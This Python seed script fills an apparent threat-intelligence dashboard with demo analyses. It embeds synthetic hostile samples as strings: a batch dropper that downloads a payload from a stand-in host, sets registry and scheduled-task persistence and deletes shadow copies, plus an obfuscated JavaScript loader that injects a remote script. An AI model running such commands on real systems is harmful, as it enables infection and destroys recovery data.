"""Populate the database with demonstration analyses.

Every row is produced by running the **real** analysis pipeline -- the seed
script does not fabricate scores or findings. That matters: the demo dashboard
therefore shows exactly what the engine actually produces, and a reviewer can
reproduce any seeded report by submitting the same indicator through the UI.

All indicators are drawn from reserved, non-routable, documentation-only space:

* `.example` and `example.com/org` -- RFC 2606 / RFC 6761 reserved names
* `203.0.113.0/24`, `198.51.100.0/24`, `192.0.2.0/24` -- RFC 5737 TEST-NETs
* EICAR -- the public, harmless industry anti-malware test artefact

No real person's data, no real infrastructure, no live malicious indicators.
Every seeded row is flagged `is_demo=True` and rendered with a DEMO badge.

Usage:
    python -m scripts.seed          # add demo data
    python -m scripts.seed --reset  # wipe existing demo rows first
"""

from __future__ import annotations

import argparse
import asyncio
import random
import sys
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

# Allow `python scripts/seed.py` as well as `python -m scripts.seed`.
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))

from sqlalchemy import delete  # noqa: E402

from app.database import SessionLocal, init_db  # noqa: E402
from app.models.analysis import Analysis  # noqa: E402
from app.services import analysis_service  # noqa: E402

# NOTE ON EICAR
# -------------
# The EICAR test file is seeded as a *hash* only, never written to disk. That
# is not squeamishness: EICAR exists precisely so that endpoint protection
# fires on it, and on a machine with real-time scanning enabled (Defender,
# say) the write is intercepted and the seed run dies with WinError 225. Since
# the platform stores hashes rather than bytes anyway, seeding the digest
# exercises exactly the same provider-lookup path with none of that fragility.
# To try the file path yourself, generate EICAR manually and upload it via the
# UI -- your AV will very likely catch it first, which is the correct outcome.

SUSPICIOUS_SCRIPT = """@echo off
REM SYNTHETIC DEMO SAMPLE - SentinelCTI seed data. Not real malware.
REM This file only *contains strings*; it performs nothing on its own.
set STAGE=http://cdn-update-service.example/payload.bin
powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=
certutil -urlcache -split -f %STAGE% %TEMP%\\update.exe
reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d %TEMP%\\update.exe
schtasks /create /tn "SystemUpdate" /tr %TEMP%\\update.exe /sc onlogon
vssadmin delete shadows /all /quiet
"""

OBFUSCATED_SCRIPT = """// SYNTHETIC DEMO SAMPLE - SentinelCTI seed data. Not real malware.
// Inert: this file is analysed as text and is never executed by the platform.
var b = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODk=";
eval(atob(b));
document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.66%2Fx.js%22%3E"));
"""

# 1x1 transparent PNG. Gives the demo dataset one clean *binary* file so the
# type-identification path is exercised, not just the text path.
MINIMAL_PNG = bytes.fromhex(
    "89504e470d0a1a0a0000000d494844520000000100000001080600000"
    "01f15c4890000000a49444154789c6360000002000100ffff03000006"
    "0005a7c1b20000000049454e44ae426082"
)

CLEAN_DOCUMENT = """SentinelCTI — Synthetic Demo Document
=====================================

This is benign sample text generated by the SentinelCTI seed script. It exists
so the demo dashboard contains at least one file analysis that scores as clean.

It contains ordinary prose, no commands, no encoded blobs and no network
indicators. Analysing it should produce a clean verdict with a risk score in
the lowest band.
"""


async def _seed_indicators(db) -> list[Analysis]:
    created: list[Analysis] = []

    # --- URLs -------------------------------------------------------------
    urls = [
        "https://example.com/products/overview",
        "http://secure-login.paypal.account-verify.example/session/renew?redirect=https://example.com",
        "http://198.51.100.23:8081/gate.php?id=8837&data=aGVsbG8gd29ybGQgZGVtbw==",
        "https://cdn-update-service.example/downloads/invoice.pdf.exe",
        "https://xn--pypal-4ve.example/signin/verify",
    ]
    for url in urls:
        created.append(await analysis_service.analyze_url(db, url, is_demo=True))

    # --- Domains ----------------------------------------------------------
    for domain in [
        "example.org",
        "secure-login-verify.example",
        "a7f3k9x2m8q4v1z6.cdn-update-service.example",
    ]:
        created.append(await analysis_service.analyze_domain(db, domain, is_demo=True))

    # --- IPs --------------------------------------------------------------
    for ip in ["8.8.8.8", "203.0.113.66", "198.51.100.23", "2001:db8::1"]:
        created.append(await analysis_service.analyze_ip(db, ip, is_demo=True))

    # --- Hashes -----------------------------------------------------------
    for digest in [
        "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",  # EICAR SHA-256
        "44d88612fea8a8f36de82e1278abb02f",  # EICAR MD5
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",  # empty file
        "3b8f2c1a9d7e4f6b0c5a8e2d1f7b4c9a6e3d0f8b2c5a7e1d4f9b6c3a0e8d2f5b",  # unknown
    ]:
        created.append(await analysis_service.analyze_hash(db, digest, is_demo=True))

    # --- Files ------------------------------------------------------------
    # Written to a temp directory and analysed through the same code path an
    # HTTP upload takes, then deleted by the service.
    samples: list[tuple[str, bytes]] = [
        ("demo-clean-notes.txt", CLEAN_DOCUMENT.encode("utf-8")),
        ("demo-suspicious-dropper.bat", SUSPICIOUS_SCRIPT.encode("utf-8")),
        ("demo-obfuscated-loader.js", OBFUSCATED_SCRIPT.encode("utf-8")),
        # A PE header with no body: enough for content-based identification to
        # disagree with the .txt extension, which is the masquerading case.
        ("demo-invoice.txt", b"MZ\x90\x00\x03\x00\x00\x00" + bytes(512)),
        ("demo-logo.png", MINIMAL_PNG),
    ]
    for filename, data in samples:
        with tempfile.TemporaryDirectory() as tmp:
            path = Path(tmp) / "sample.bin"
            path.write_bytes(data)
            created.append(
                await analysis_service.analyze_file(db, path, filename, len(data), is_demo=True)
            )

    return created


def _spread_over_time(db, records: list[Analysis]) -> None:
    """Backdate demo rows so the activity chart has a realistic shape.

    Live analyses always land at "now"; without this every demo row would stack
    on a single bar and the time-series chart would look broken.
    """
    rng = random.Random(20260813)  # fixed seed => reproducible demo dataset
    now = datetime.now(timezone.utc)
    for record in records:
        days_ago = rng.choices(
            population=list(range(0, 30)),
            # Weight recent days more heavily, as real submission volume is.
            weights=[max(1, 30 - d) for d in range(0, 30)],
            k=1,
        )[0]
        record.created_at = now - timedelta(
            days=days_ago, hours=rng.randint(0, 23), minutes=rng.randint(0, 59)
        )
    db.commit()


async def main(reset: bool) -> None:
    init_db()
    db = SessionLocal()
    try:
        if reset:
            removed = db.execute(delete(Analysis).where(Analysis.is_demo.is_(True))).rowcount
            db.commit()
            print(f"Removed {removed} existing demo analyses.")

        print("Running the real analysis pipeline over demo indicators...")
        records = await _seed_indicators(db)
        _spread_over_time(db, records)

        print(f"\nSeeded {len(records)} synthetic analyses:\n")
        for record in sorted(records, key=lambda r: -r.risk_score):
            # str(): the columns are plain strings on the way back out of the
            # database, and StrEnum members compare/format identically anyway.
            print(
                f"  {record.reference}  {record.risk_score:>3}/100  "
                f"{str(record.verdict):<10} {str(record.indicator_type):<7} "
                f"{record.indicator_display[:56]}"
            )
        print("\nAll seeded rows are flagged is_demo=True and labelled DEMO in the UI.")
    finally:
        db.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Seed SentinelCTI with synthetic demo analyses.")
    parser.add_argument("--reset", action="store_true", help="Delete existing demo rows first.")
    args = parser.parse_args()
    asyncio.run(main(args.reset))
